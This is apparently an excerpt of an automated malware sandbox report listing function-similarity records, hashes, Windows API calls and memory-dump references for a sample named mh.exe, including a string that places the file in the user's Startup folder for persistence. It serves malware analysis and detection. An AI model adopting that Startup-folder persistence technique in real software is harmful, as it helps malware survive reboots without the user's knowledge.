      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn$swprintf
      • String ID: SIZE
      • API String ID: 449872665-3243624926
      • Opcode ID: 1ee6a6b9fbbd6c3126f8bc5ffec1b6aa008f2877db1f13591811bbd6ed408201
      • Instruction ID: 5539f8cd157c86e16cbf27d41e61d23b8fa0cf9e363dfe77d579b644683e388f
      • Opcode Fuzzy Hash: 1ee6a6b9fbbd6c3126f8bc5ffec1b6aa008f2877db1f13591811bbd6ed408201
      • Instruction Fuzzy Hash: D741A366A1C652C5EB12FB64E4413BDA350FF85791F904231EBAD066D6EFBCD540C720
      APIs
      Strings
      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe, xrefs: 00007FF741ECC2F9
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: FileModuleName_invalid_parameter_noinfo
      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe
      • API String ID: 3307058713-1822913178
      • Opcode ID: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
      • Instruction ID: 3c3a8aaac1979429e307ae70c12605536f5d76d2f4e9ff1b14b5466e4fbccde0
      • Opcode Fuzzy Hash: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
      • Instruction Fuzzy Hash: 8F41903AA0CA62C6EB16BF26A8401BCA794FB44785BC54036EE4D47B45EFBDE441C760
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: ItemText$DialogWindow
      • String ID: ASKNEXTVOL
      • API String ID: 445417207-3402441367
      • Opcode ID: 97ebd98f0834f70bd8f3ada112357d921bc9d5e9383391aa045354938bfaeae3
      • Instruction ID: ca8735d65cfd89d702a0ffbbd55782c51fb4e1195d15d6c30357f228bdbd9bba
      • Opcode Fuzzy Hash: 97ebd98f0834f70bd8f3ada112357d921bc9d5e9383391aa045354938bfaeae3
      • Instruction Fuzzy Hash: FD41B16AA0C662C1FB16FB15E4802B9A790BF86BC2FD40135DE4D07796DFBDE4418760
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: ByteCharMultiWide_snwprintf
      • String ID: $%s$@%s
      • API String ID: 2650857296-834177443
      • Opcode ID: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
      • Instruction ID: 101cdc79381612b6ac02df30a5882f3fb4d7384e44af1ae92cad083c9cb83f9b
      • Opcode Fuzzy Hash: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
      • Instruction Fuzzy Hash: D031C17AB1CA66C5EB12BF66E4407E9A7A0BB847C5F800032EE0C07795EE7CE505C720
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: FileHandleType
      • String ID: @
      • API String ID: 3000768030-2766056989
      • Opcode ID: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
      • Instruction ID: 5e6cb3795d613debe9ed886cb6cfaf945217e5a800e441f6988ec4b2fee50c8d
      • Opcode Fuzzy Hash: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
      • Instruction Fuzzy Hash: A2219326B0C6A2C1EB71BB24D890178AA51FB45B75F680335D66F067D8EFB8D881C330
      APIs
      • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF741EC1D3E), ref: 00007FF741EC40BC
      • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF741EC1D3E), ref: 00007FF741EC4102
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: ExceptionFileHeaderRaise
      • String ID: csm
      • API String ID: 2573137834-1018135373
      • Opcode ID: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
      • Instruction ID: 542ad1f3c99c48c5ec9334fbc67d288e7a0377d8d79cfec840017797ea440a41
      • Opcode Fuzzy Hash: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
      • Instruction Fuzzy Hash: 8A113D3660CB5182EB21BB15E840269B7E1FB88B95F584231DF8D07768EF7CD555C700
      APIs
      • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF741EAE95F,?,?,?,00007FF741EA463A,?,?,?), ref: 00007FF741EAEA63
      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF741EAE95F,?,?,?,00007FF741EA463A,?,?,?), ref: 00007FF741EAEA6E
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: ErrorLastObjectSingleWait
      • String ID: WaitForMultipleObjects error %d, GetLastError %d
      • API String ID: 1211598281-2248577382
      • Opcode ID: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
      • Instruction ID: 7653d7d00401a472e302d1cd9aadb91faa6abd76ec961e5316a9de7083308add
      • Opcode Fuzzy Hash: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
      • Instruction Fuzzy Hash: 47E01A6DE1D823D1F702B7219C42978A2117FA17B2FD84330D53E411E1AEACA94A8321
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: FindHandleModuleResource
      • String ID: RTL
      • API String ID: 3537982541-834975271
      • Opcode ID: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
      • Instruction ID: e982d869076c0f57025fdfa0477fa408d7fcb973b1f5c71d58118a4c742a1fea
      • Opcode Fuzzy Hash: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
      • Instruction Fuzzy Hash: B3D01255F0D613C1FF1A7771644573452906B18B42F884038C91D06390DEAC9489C760
      APIs
      • GetSystemTimeAsFileTime.KERNEL32 ref: 00978035
      • GetCurrentProcessId.KERNEL32 ref: 00978040
      • GetCurrentThreadId.KERNEL32 ref: 00978049
      • GetTickCount.KERNEL32 ref: 00978051
      • QueryPerformanceCounter.KERNEL32 ref: 0097805E
      Memory Dump Source
      • Source File: 0000000A.00000002.3334129054.0000000000761000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00760000, based on PE: true
      • Associated: 0000000A.00000002.3334105901.0000000000760000.00000002.00000001.01000000.0000000C.sdmpDownload File
      • Associated: 0000000A.00000002.3334257775.000000000097A000.00000008.00000001.01000000.0000000C.sdmpDownload File
      • Associated: 0000000A.00000002.3334257775.0000000000998000.00000008.00000001.01000000.0000000C.sdmpDownload File
      • Associated: 0000000A.00000002.3334295359.0000000000999000.00000002.00000001.01000000.0000000C.sdmpDownload File
      • Associated: 0000000A.00000002.3334407699.0000000000BA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
      • Associated: 0000000A.00000002.3334422702.0000000000BA1000.00000004.00000001.01000000.0000000C.sdmpDownload File
      • Associated: 0000000A.00000002.3334436911.0000000000BA2000.00000008.00000001.01000000.0000000C.sdmpDownload File
      • Associated: 0000000A.00000002.3334451164.0000000000BA5000.00000002.00000001.01000000.0000000C.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_10_2_760000_hm.jbxd
      Similarity
      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
      • String ID:
      • API String ID: 1445889803-0
      • Opcode ID: cd4e50871ce1b84376be2397e3deaae051754c4662a572f4309cc6364f0aff0f
      • Instruction ID: f43ad0897e9643a093712d1330d2c0248d816a36e399aef2dad969e6077020fd
      • Opcode Fuzzy Hash: cd4e50871ce1b84376be2397e3deaae051754c4662a572f4309cc6364f0aff0f
      • Instruction Fuzzy Hash: F8118C66756B1086FB504B29FC1835AB260B74A7F0F084A399E9C42BA4EF3CC48AC300